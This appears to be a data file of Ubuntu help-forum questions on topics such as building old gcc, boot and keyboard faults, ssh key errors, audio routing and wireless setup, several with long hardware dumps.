421938	installing gcc 3.2 : how to resolve error `` lvalue required as increment operand '' ?	i am using ubuntu 10.04 and the current version of gcc installed in my system is 4.4 . for some specific need i want to install gcc 3.2 . i began with these steps : $ mkdir gcc-build $ cd gcc-build $ tar zxvf gcc-3.2.tar.gz $ mkdir -p gcc-bin $ mkdir -p usr/local $ cd gcc-bin $ ../gcc-build/gcc-3.2/configure -- prefix=../gcc-build/usr/local it has configured successfully . but when i used below command $ make bootstrap i got an error ../gcc-build/gcc-3.2/gcc/read-rtl.c:653 : error : lvalue required as increment operand make [ 1 ] : *** [ read-rtl.o ] error 1 make [ 1 ] : leaving directory `../gcc-build/gcc-bin/gcc' make : *** [ all-gcc ] error 2 anybody please help me to resolve this error . or please suggest some alternative ways . thanks .
421941	problem with ubuntu server 13.10 on hp proliant dl 360 g7 , keyboard unresponsive after boot	i have an hp proliant server , on which i just installed ubuntu 13.10 from dvd . i have a lot of problems installing from a usb thumb drive ( which is another story ) , but installing from dvd went without a hitch . however , once i boot the server , the keyboard is inoperative . i know that the hardware is good because i can control the boot process that the server goes through with its software in rom . i can also enter grub and boot in single user mode , and i can boot verbosely . i see messages scroll by to the effect that the keyboard and the mouse are recognized and identified correctly . it does n't matter if i use a usb hub or not , and it does n't matter if i use the usb ports on the front or the back . the broadcom network interface card is only recognized in ubuntu 13.10 , prior versions do not recognize it , and have problems installing because they want to go to the network .
421945	drag text from terminal ?	is there anyway i can drag the text out from terminal and release in some other terminal or text file ? i am asking for a laptop , where a touchpad is used .
421946	multiple nvidia drivers to install	i 'm wondering what the difference is . there , among theses , there are two of the latest to choose from , the nvidia 331.20 drivers . they have the exact same description ( for geforce 8 and later ) .
421947	is there a way to modulate my voice on the fly ?	i need a way to modulate my voice on-the-fly ( to lower or raise pitch , etc , for privacy ) for use in mumble , teamspeak and other such programs . is there any way to do this under linux/ubuntu ? i have found a couple possible programs under windows , and if necessary i could run mumble , teamspeak , etc . under virtualbox/wine along with a modulator , but i would far prefer to use linux , although i have not been able to find any native programs for linux that can do this during my quick google search .
421948	unable to boot ubuntu 12.04 blank screen	i install likewise open and connect to sama on some other server when i restart the computer , curser blinks but nothing happens . when i press the power button on the cpu then only screen displayed , like wise open not supported and some other services stopping and finally turn off the pc . please help me out i done have and cd/pd to boot the computer .
421950	how to fix `` smpboot : booting node 0 , processors # 1 '' - will coreboot or uefi help ?	i am running a dual boot windows 7/ubuntu 13.10 on a hp dv7t-4100 pc , with grub2 reinstalled through boot-repair in linux . occasionally i can not boot into linux - and even have trouble in windows . when i boot linux in recovery mode , it freezes at the line : smpboot : booting node 0 , processors # 1 immediately preceding that line i see : perf_event_intel : cpu erratum aaj80 worked around perf_event_intel : cpuid merkedevent : 'bus cycles ' unavailable i read that there is known bug in intel 's i7 nehalem processors , i think that is the `` cpu erratum aaj80 worked around '' i added `` reboot-bios '' to grub_cmdline_linux_default and i think it 's working a little better . i do not want to add max-cpus=1 sometimes it seems that by booting into windows and installing updates fixes the problem . after a successful boot lscpu shows all 8 cpus . i am thinking about ditching grub for coreboot ( instead of uefi ) but such a fundamental change makes me nervous . there is apparrently a uefi driver by hp for my model . also , i read about the grub-coreboot-bin package for ubuntu , but i 'm not sure what it does ? also i can not find my laptop model , motherboard or chipset in the list of supported devices for coreboot v4 , v3 or v1 , which adds my anxiety unless someone can tell me it will work . [ note : i could not add the `` coreboot '' tag i do n't have enuf cred ] lspci : 00:00.0 host bridge : intel corporation core processor dmi ( rev 11 ) 00:03.0 pci bridge : intel corporation core processor pci express root port 1 ( rev 11 ) 00:08.0 system peripheral : intel corporation core processor system management registers ( rev 11 ) 00:08.1 system peripheral : intel corporation core processor semaphore and scratchpad registers ( rev 11 ) 00:08.2 system peripheral : intel corporation core processor system control and status registers ( rev 11 ) 00:08.3 system peripheral : intel corporation core processor miscellaneous registers ( rev 11 ) 00:10.0 system peripheral : intel corporation core processor qpi link ( rev 11 ) 00:10.1 system peripheral : intel corporation core processor qpi routing and protocol registers ( rev 11 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] redwood hdmi audio [ radeon hd 5000 series ] 02:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ] 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 03 ) 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 04 ) 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 04 ) 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 04 ) 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 04 ) 7f:03.0 host bridge : intel corporation core processor integrated memory controller ( rev 04 ) 7f:03.1 host bridge : intel corporation core processor integrated memory controller target address decoder ( rev 04 ) 7f:03.4 host bridge : intel corporation core processor integrated memory controller test registers ( rev 04 ) 7f:04.0 host bridge : intel corporation core processor integrated memory controller channel 0 control registers ( rev 04 ) 7f:04.1 host bridge : intel corporation core processor integrated memory controller channel 0 address registers ( rev 04 ) 7f:04.2 host bridge : intel corporation core processor integrated memory controller channel 0 rank registers ( rev 04 ) 7f:04.3 host bridge : intel corporation core processor integrated memory controller channel 0 thermal control registers ( rev 04 ) 7f:05.0 host bridge : intel corporation core processor integrated memory controller channel 1 control registers ( rev 04 ) 7f:05.1 host bridge : intel corporation core processor integrated memory controller channel 1 address registers ( rev 04 ) 7f:05.2 host bridge : intel corporation core processor integrated memory controller channel 1 rank registers ( rev 04 ) 7f:05.3 host bridge : intel corporation core processor integrated memory controller channel 1 thermal control registers ( rev 04 ) dmidecode : # dmidecode 2.12 smbios 2.6 present . 33 structures occupying 1675 bytes . table at 0x000e94c0 . handle 0x0000 , dmi type 0 , 24 bytes bios information vendor : hewlett-packard version : f.29 release date : 11/07/2011 rom size : 1536 kb characteristics : pci is supported bios is upgradeable bios shadowing is allowed boot from cd is supported selectable boot is supported edd is supported japanese floppy for nec 9800 1.2 mb is supported ( int 13h ) japanese floppy for toshiba 1.2 mb is supported ( int 13h ) 5.25 '' /360 kb floppy services are supported ( int 13h ) 5.25 '' /1.2 mb floppy services are supported ( int 13h ) 3.5 '' /720 kb floppy services are supported ( int 13h ) 3.5 '' /2.88 mb floppy services are supported ( int 13h ) 8042 keyboard services are supported ( int 9h ) cga/mono video services are supported ( int 10h ) acpi is supported usb legacy is supported bios boot specification is supported targeted content distribution is supported bios revision : 15.41 firmware revision : 101.56 handle 0x0001 , dmi type 1 , 27 bytes system information manufacturer : hewlett-packard product name : hp pavilion dv7 notebook pc version : 0589110000242b20010020100 serial number : cnf0486mk9 uuid : 30464e43-3834-4d36-4b39-78acc043f21f wake-up type : power switch sku number : ww181av family : 103c_5335kv handle 0x0002 , dmi type 2 , 16 bytes base board information manufacturer : hewlett-packard product name : 1449 version : 65.38 serial number : pl61z011zzr05d asset tag : base board asset tag features : board is a hosting board board is replaceable location in chassis : base board chassis location chassis handle : 0x0003 type : motherboard contained object handles : 0 handle 0x0003 , dmi type 3 , 22 bytes chassis information manufacturer : hewlett-packard type : notebook lock : not present version : n/a serial number : none asset tag : boot-up state : safe power supply state : safe thermal state : safe security status : none oem information : 0x0000022b height : unspecified number of power cords : 1 contained elements : 0 sku number : not specified handle 0x0004 , dmi type 9 , 17 bytes system slot information designation : pci express graphic x16 type : x16 pci express x16 current usage : available length : other id : 0 characteristics : pme signal is supported hot-plug devices are supported bus address : 0000:00:01.0 handle 0x0005 , dmi type 9 , 17 bytes system slot information designation : pci express x1-0 type : x1 pci express x1 current usage : available length : other id : 0 characteristics : pme signal is supported hot-plug devices are supported bus address : 0000:00:1c.0 handle 0x0006 , dmi type 9 , 17 bytes system slot information designation : pci express x1-1 type : x1 pci express x1 current usage : available length : other id : 1 characteristics : pme signal is supported hot-plug devices are supported bus address : 0000:00:1c.1 handle 0x0007 , dmi type 10 , 6 bytes on board device information type : video status : enabled description : video graphics controller handle 0x0008 , dmi type 10 , 6 bytes on board device information type : ethernet status : enabled description : realtek lan controller handle 0x0009 , dmi type 11 , 5 bytes oem strings string 1 : $ hp $ string 2 : loc # aba string 3 : abs 70/71 79 7a 7b 7c string 4 : cnb1 0589110000242b20010020100 string 5 : hp_mute_led_0_0 handle 0x000a , dmi type 12 , 5 bytes system configuration options option 1 : string1 for type12 equipment manufacturer option 2 : string2 for type12 equipment manufacturer option 3 : string3 for type12 equipment manufacturer option 4 : string4 for type12 equipment manufacturer handle 0x000b , dmi type 15 , 29 bytes system event log area length : 0 bytes header start offset : 0x0000 data start offset : 0x0000 access method : general-purpose non-volatile data functions access address : 0x0000 status : valid , not full change token : 0x12345678 header format : oem-specific supported log type descriptors : 3 descriptor 1 : post memory resize data format 1 : none descriptor 2 : post error data format 2 : post results bitmap descriptor 3 : log area reset/cleared data format 3 : none handle 0x000c , dmi type 21 , 7 bytes built-in pointing device type : touch pad interface : ps/2 buttons : 4 handle 0x000d , dmi type 22 , 26 bytes portable battery location : in the back manufacturer : 13dp-sdi51 name : mu06055 chemistry : lithium ion design capacity : 5100 mwh design voltage : 10800 mv sbds version : 3.1 maximum error : 1 % sbds serial number : 454c sbds manufacture date : 2010-11-23 oem-specific information : 0xffffffff handle 0x000e , dmi type 32 , 20 bytes system boot information status : no errors detected handle 0x000f , dmi type 41 , 11 bytes onboard device reference designation : ati mobility radeon hd 5650 type : video status : enabled type instance : 1 bus address : 0000:01:00.0 handle 0x0010 , dmi type 41 , 11 bytes onboard device reference designation : intel ( r ) centrino ( r ) advanced-n 1000 agn type : other status : enabled type instance : 1 bus address : 0000:02:00.0 handle 0x0011 , dmi type 131 , 64 bytes oem-specific type header and data : 83 40 11 00 37 00 00 00 00 00 32 d1 06 00 00 00 f8 00 09 3b 00 00 00 00 01 20 00 00 01 00 06 00 15 04 01 00 00 00 00 00 c8 00 ff ff 00 00 00 ff 00 00 00 00 76 00 00 00 76 50 72 6f 00 00 00 00 handle 0x0012 , dmi type 4 , 42 bytes processor information socket designation : cpu type : central processor family : core 2 duo manufacturer : intel ( r ) corporation id : e5 06 01 00 ff fb eb bf signature : type 0 , family 6 , model 30 , stepping 5 flags : fpu ( floating-point unit on-chip ) vme ( virtual mode extension ) de ( debugging extension ) pse ( page size extension ) tsc ( time stamp counter ) msr ( model specific registers ) pae ( physical address extension ) mce ( machine check exception ) cx8 ( cmpxchg8 instruction supported ) apic ( on-chip apic hardware supported ) sep ( fast system call ) mtrr ( memory type range registers ) pge ( page global enable ) mca ( machine check architecture ) cmov ( conditional move instruction supported ) pat ( page attribute table ) pse-36 ( 36-bit page size extension ) clfsh ( clflush instruction supported ) ds ( debug store ) acpi ( acpi supported ) mmx ( mmx technology supported ) fxsr ( fxsave and fxstor instructions supported ) sse ( streaming simd extensions ) sse2 ( streaming simd extensions 2 ) ss ( self-snoop ) htt ( multi-threading ) tm ( thermal monitor supported ) pbe ( pending break enabled ) version : intel ( r ) core ( tm ) i7 cpu q 720 @ 1.60ghz voltage : 1.2 v external clock : 1066 mhz max speed : 1600 mhz current speed : 1600 mhz status : populated , enabled upgrade : zif socket l1 cache handle : 0x0016 l2 cache handle : 0x0015 l3 cache handle : 0x0013 serial number : not specified asset tag : ffff part number : not specified core count : 4 core enabled : 4 thread count : 8 characteristics : 64-bit capable handle 0x0013 , dmi type 7 , 19 bytes cache information socket designation : l3 cache configuration : enabled , not socketed , level 3 operational mode : write through location : internal installed size : 6144 kb maximum size : 6144 kb supported sram types : synchronous installed sram type : synchronous speed : unknown error correction type : single-bit ecc system type : unified associativity : 12-way set-associative handle 0x0014 , dmi type 7 , 19 bytes cache information socket designation : l1 cache configuration : enabled , not socketed , level 1 operational mode : write through location : internal installed size : 32 kb maximum size : 32 kb supported sram types : synchronous installed sram type : synchronous speed : unknown error correction type : single-bit ecc system type : data associativity : 8-way set-associative handle 0x0015 , dmi type 7 , 19 bytes cache information socket designation : l2 cache configuration : enabled , not socketed , level 2 operational mode : write through location : internal installed size : 256 kb maximum size : 256 kb supported sram types : synchronous installed sram type : synchronous speed : unknown error correction type : single-bit ecc system type : unified associativity : 8-way set-associative handle 0x0016 , dmi type 7 , 19 bytes cache information socket designation : l1 cache configuration : enabled , not socketed , level 1 operational mode : write through location : internal installed size : 32 kb maximum size : 32 kb supported sram types : synchronous installed sram type : synchronous speed : unknown error correction type : single-bit ecc system type : instruction associativity : 4-way set-associative handle 0x0017 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 8 gb error information handle : no error number of devices : 2 handle 0x0018 , dmi type 17 , 28 bytes memory device array handle : 0x0017 error information handle : 0x0019 total width : 64 bits data width : 64 bits size : 4096 mb form factor : sodimm set : none locator : bottom - slot 1 bank locator : bank 0 type : ddr3 type detail : synchronous speed : 1333 mhz manufacturer : nanya serial number : c575026f asset tag : unknown part number : nt4gc64b8hb0ns-cg rank : 2 handle 0x0019 , dmi type 18 , 23 bytes 32-bit memory error information type : ok granularity : unknown operation : unknown vendor syndrome : unknown memory array address : unknown device address : unknown resolution : unknown handle 0x001a , dmi type 20 , 19 bytes memory device mapped address starting address : 0x00000000000 ending address : 0x000ffffffff range size : 4 gb physical device handle : 0x0018 memory array mapped address handle : 0x001f partition row position : 2 interleave position : 1 interleaved data depth : 1 handle 0x001b , dmi type 17 , 28 bytes memory device array handle : 0x0017 error information handle : 0x001c total width : 64 bits data width : 64 bits size : 4096 mb form factor : sodimm set : none locator : bottom - slot 2 bank locator : bank 1 type : ddr3 type detail : synchronous speed : 1333 mhz manufacturer : nanya serial number : bb85026f asset tag : unknown part number : nt4gc64b8hb0ns-cg rank : 2 handle 0x001c , dmi type 18 , 23 bytes 32-bit memory error information type : ok granularity : unknown operation : unknown vendor syndrome : unknown memory array address : unknown device address : unknown resolution : unknown handle 0x001d , dmi type 20 , 19 bytes memory device mapped address starting address : 0x00000000000 ending address : 0x000ffffffff range size : 4 gb physical device handle : 0x001b memory array mapped address handle : 0x001f partition row position : 2 interleave position : 2 interleaved data depth : 1 handle 0x001e , dmi type 18 , 23 bytes 32-bit memory error information type : ok granularity : unknown operation : unknown vendor syndrome : unknown memory array address : unknown device address : unknown resolution : unknown handle 0x001f , dmi type 19 , 15 bytes memory array mapped address starting address : 0x00000000000 ending address : 0x001ffffffff range size : 8 gb physical array handle : 0x0017 partition width : 2 handle 0x0020 , dmi type 127 , 4 bytes end of table biosdecode : # biosdecode 2.12 acpi 2.0 present . oem identifier : hpqoem rsd table 32-bit address : 0xbbffe0ac xsd table 64-bit address : 0x00000000bbffe120 pnp bios 1.0 present . event notification : not supported real mode 16-bit code address : f000 : b9bf real mode 16-bit data address : 0040:0000 16-bit protected mode code address : 0x000fb9ca 16-bit protected mode data address : 0x00000400 oem device identifier : sst2400 smbios 2.6 present . structure table length : 1675 bytes structure table address : 0x000e94c0 number of structures : 33 maximum structure size : 174 bytes pci interrupt routing 1.0 present . router id : 00:1f.0 exclusive irqs : none compatible router : 8086:122e slot entry 1 : id 01:00 , on-board slot entry 2 : id 03:00 , on-board slot entry 3 : id 0a:00 , on-board slot entry 4 : id 0b:00 , on-board slot entry 5 : id 00:01 , on-board slot entry 6 : id 00:02 , on-board slot entry 7 : id 00:03 , on-board slot entry 8 : id 00:04 , on-board slot entry 9 : id 00:05 , on-board slot entry 10 : id 00:06 , on-board slot entry 11 : id 00:1a , on-board slot entry 12 : id 00:1b , on-board slot entry 13 : id 00:1c , on-board slot entry 14 : id 00:1d , on-board slot entry 15 : id 00:1f , on-board slot entry 16 : id 02:00 , on-board slot entry 17 : id 03:00 , on-board slot entry 18 : id 04:00 , on-board slot entry 19 : id 05:00 , on-board slot entry 20 : id 06:00 , on-board slot entry 21 : id 07:00 , on-board slot entry 22 : id 08:00 , on-board slot entry 23 : id 09:00 , on-board slot entry 24 : id 00:00 , on-board slot entry 25 : id 00:00 , on-board slot entry 26 : id 00:00 , on-board slot entry 27 : id 00:00 , on-board slot entry 28 : id 00:00 , on-board slot entry 29 : id 00:00 , on-board slot entry 30 : id 00:00 , on-board slot entry 31 : id 00:00 , on-board slot entry 32 : id 00:00 , on-board slot entry 33 : id 00:00 , on-board slot entry 34 : id 00:00 , on-board slot entry 35 : id 00:00 , on-board slot entry 36 : id 00:00 , on-board slot entry 37 : id 00:00 , on-board slot entry 38 : id 00:00 , on-board
421954	setting java_home	how do i set java_home=/usr/lib/jvm ... e ? the instructions say to use install4j java_home=/usr/lib/jvm/java-6-sun but i get an error that says : install4j : command not found i have downloaded install4j and i installed it ( i think ) . it asked all sorts of questions that i did not know how to answer , so i just hit `` next '' a lot . any ideas ?
421955	software to find desktop power usage ?	since i have moved from windows xp to ubuntu 12.10 , i have been constantly blamed for increased electricity bills . ( that may be true , but i think the reason is increase in the time i use my computer , because it is more productive now ) . is there any software that would calculate how much power my computer actually uses ? note that i use a desktop and the powertop , powerstat , and power statistics programs referenceed here only work for laptops . the answer suggests that for desktop the only solution `` then '' is to use a electronic watt-meter . has the situation changed in last 2 years ?
421958	permission denied ( publickey , gssapi-with-mic )	i am trying to connect to a vm using this command : sudo ssh -i /home/ritesh/.ssh/id_rsa1 tc @ 54.80.22.15 -l 5901 : localhost:5901 but it 's giving me this error : the authenticity of host '54.80.22.15 ( 54.80.22.15 ) ' ca n't be established . rsa key fingerprint is x . are you sure you want to continue connecting ( yes/no ) ? yes warning : permanently added 'xx.xx.xx.xx ' ( rsa ) to the list of known hosts . permission denied ( publickey , gssapi-with-mic ) . how do i resolve this error ?
421959	convert downloaded youtube videos ( downloaded with youtube-dl ) to audio-only , with no loss ?	if one downloads videos from youtube using youtube-dl , they get .mp4 files which are a iso media , mpeg v4 system , version 2 . can these files be converted to audio-only , ideally with no quality loss ? the goal is to save space by throwing out the unneeded visual part .
421964	windows 8.1 clock time always wrong	i am using dual boot operating systems on my dell inspiron n4050 laptop with windows 8.1 and ubuntu 13.10 . the time in windows remains correct while i keep using it . but when i log into ubuntu and then again restart my laptop and login to windows , my windows clock always shows the wrong time , a difference of about 5 hours . i have configured my region and synchronized it to the time at windows.com , but i am still facing the same problem . please give me guidance .
421966	make pulseaudio ignore usb sound card	i am running jack to driver an external usb card ( focusrie scarlett 18i8 ) . when i plug the card in , pulse sometimes takes over the card and jack can not be started ( it needs exclusive access to the device ) . what is the way to make pulseaudio ignore the 'hw : usb ' alsa device ?
421967	can not connect to wireless network in 12.04lts	spent all night trying every solution online , but still none of them worked . i am a novice to ubuntu , so please help ! any idea appreciated ! result of lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation 82q35 express dram controller [ 8086:29b0 ] ( rev 02 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 82q35 express integrated graphics controller [ 8086:29b2 ] ( rev 02 ) 00:02.1 display controller [ 0380 ] : intel corporation 82q35 express integrated graphics controller [ 8086:29b3 ] ( rev 02 ) 00:03.0 communication controller [ 0780 ] : intel corporation 82q35 express mei controller [ 8086:29b4 ] ( rev 02 ) 00:03.2 ide interface [ 0101 ] : intel corporation 82q35 express pt ider controller [ 8086:29b6 ] ( rev 02 ) 00:03.3 serial controller [ 0700 ] : intel corporation 82q35 express serial kt controller [ 8086:29b7 ] ( rev 02 ) 00:19.0 ethernet controller [ 0200 ] : intel corporation 82566dm-2 gigabit network connection [ 8086:10bd ] ( rev 02 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 [ 8086:2937 ] ( rev 02 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 [ 8086:2938 ] ( rev 02 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 [ 8086:293c ] ( rev 02 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801i ( ich9 family ) hd audio controller [ 8086:293e ] ( rev 02 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 1 [ 8086:2940 ] ( rev 02 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 [ 8086:2934 ] ( rev 02 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 [ 8086:2935 ] ( rev 02 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 [ 8086:2936 ] ( rev 02 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 [ 8086:293a ] ( rev 02 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev 92 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801io ( ich9do ) lpc interface controller [ 8086:2914 ] ( rev 02 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801ir/io/ih ( ich9r/do/dh ) 4 port sata controller [ ide mode ] [ 8086:2920 ] ( rev 02 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801i ( ich9 family ) smbus controller [ 8086:2930 ] ( rev 02 ) 00:1f.5 ide interface [ 0101 ] : intel corporation 82801i ( ich9 family ) 2 port sata controller [ ide mode ] [ 8086:2926 ] ( rev 02 ) and lshw returns : my-computer-1234 description : computer width : 64 bits capabilities : vsyscall32 *-core description : motherboard physical id : 0 *-memory description : system memory physical id : 0 size : 1959mib *-cpu product : intel ( r ) core ( tm ) 2 duo cpu e6550 @ 2.33ghz vendor : intel corp. physical id : 1 bus info : cpu @ 0 size : 2ghz capacity : 2ghz width : 64 bits capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx x86-64 constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm lahf_lm dtherm tpr_shadow vnmi flexpriority cpufreq *-pci description : host bridge product : 82q35 express dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 02 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display:0 description : vga compatible controller product : 82q35 express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory : fea00000-fea7ffff ioport : ec90 ( size=8 ) memory : d0000000-dfffffff memory : feb00000-febfffff *-display:1 unclaimed description : display controller product : 82q35 express integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 02 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : fea80000-feafffff *-communication:0 description : communication controller product : 82q35 express mei controller vendor : intel corporation physical id : 3 bus info : pci @ 0000:00:03.0 version : 02 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=mei latency=0 resources : irq:42 memory : f0000000-f000000f *-ide:0 description : ide interface product : 82q35 express pt ider controller vendor : intel corporation physical id : 3.2 bus info : pci @ 0000:00:03.2 version : 02 width : 32 bits clock : 66mhz capabilities : ide bus_master cap_list configuration : driver=ata_generic latency=0 resources : irq:18 ioport : fe80 ( size=8 ) ioport : fe90 ( size=4 ) ioport : fea0 ( size=8 ) ioport : feb0 ( size=4 ) ioport : fef0 ( size=16 ) *-communication:1 description : serial controller product : 82q35 express serial kt controller vendor : intel corporation physical id : 3.3 bus info : pci @ 0000:00:03.3 version : 02 width : 32 bits clock : 66mhz capabilities : 16550 bus_master cap_list configuration : driver=serial latency=0 resources : irq:17 ioport : ec98 ( size=8 ) memory : fe9da000-fe9dafff *-network description : ethernet interface product : 82566dm-2 gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 02 serial : 00:1e:4f : e9:01 : ed size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.5.1-k duplex=full firmware=1.4-0 ip=192.168.1.84 latency=0 multicast=yes port=twisted pair speed=100mbit/s resources : irq:41 memory : fe9e0000-fe9fffff memory : fe9db000-fe9dbfff ioport : ecc0 ( size=32 ) *-usb:0 description : usb controller product : 82801i ( ich9 family ) usb uhci controller # 4 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport : ff20 ( size=32 ) *-usb:1 description : usb controller product : 82801i ( ich9 family ) usb uhci controller # 5 vendor : intel corporation physical id : 1a.1 bus info : pci @ 0000:00:1a.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:17 ioport : ff00 ( size=32 ) *-usb:2 description : usb controller product : 82801i ( ich9 family ) usb2 ehci controller # 2 vendor : intel corporation physical id : 1a.7 bus info : pci @ 0000:00:1a.7 version : 02 width : 32 bits clock : 33mhz capabilities : ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:22 memory : fe9d9c00-fe9d9fff *-multimedia description : audio device product : 82801i ( ich9 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:44 memory : fe9dc000-fe9dffff *-pci:0 description : pci bridge product : 82801i ( ich9 family ) pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:1000 ( size=4096 ) memory : fe800000-fe8fffff ioport : f0100000 ( size=2097152 ) *-usb:3 description : usb controller product : 82801i ( ich9 family ) usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport : ff80 ( size=32 ) *-usb:4 description : usb controller product : 82801i ( ich9 family ) usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:17 ioport : ff60 ( size=32 ) *-usb:5 description : usb controller product : 82801i ( ich9 family ) usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport : ff40 ( size=32 ) *-usb:6 description : usb controller product : 82801i ( ich9 family ) usb2 ehci controller # 1 vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : ff980800-ff980bff *-pci:1 description : pci bridge product : 82801 pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : 92 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-isa description : isa bridge product : 82801io ( ich9do ) lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-ide:1 description : ide interface product : 82801ir/io/ih ( ich9r/do/dh ) 4 port sata controller [ ide mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 02 width : 32 bits clock : 66mhz capabilities : ide bus_master cap_list configuration : driver=ata_piix latency=0 resources : irq:18 ioport : fe00 ( size=8 ) ioport : fe10 ( size=4 ) ioport : fe20 ( size=8 ) ioport : fe30 ( size=4 ) ioport : fec0 ( size=16 ) ioport : eca0 ( size=16 ) *-serial description : smbus product : 82801i ( ich9 family ) smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 64 bits clock : 33mhz configuration : driver=i801_smbus latency=0 resources : irq:18 memory : fe9d9b00-fe9d9bff ioport : ece0 ( size=32 ) *-ide:2 description : ide interface product : 82801i ( ich9 family ) 2 port sata controller [ ide mode ] vendor : intel corporation physical id : 1f.5 bus info : pci @ 0000:00:1f.5 version : 02 width : 32 bits clock : 66mhz capabilities : ide bus_master cap_list configuration : driver=ata_piix latency=0 resources : irq:18 ioport : fe40 ( size=8 ) ioport : fe50 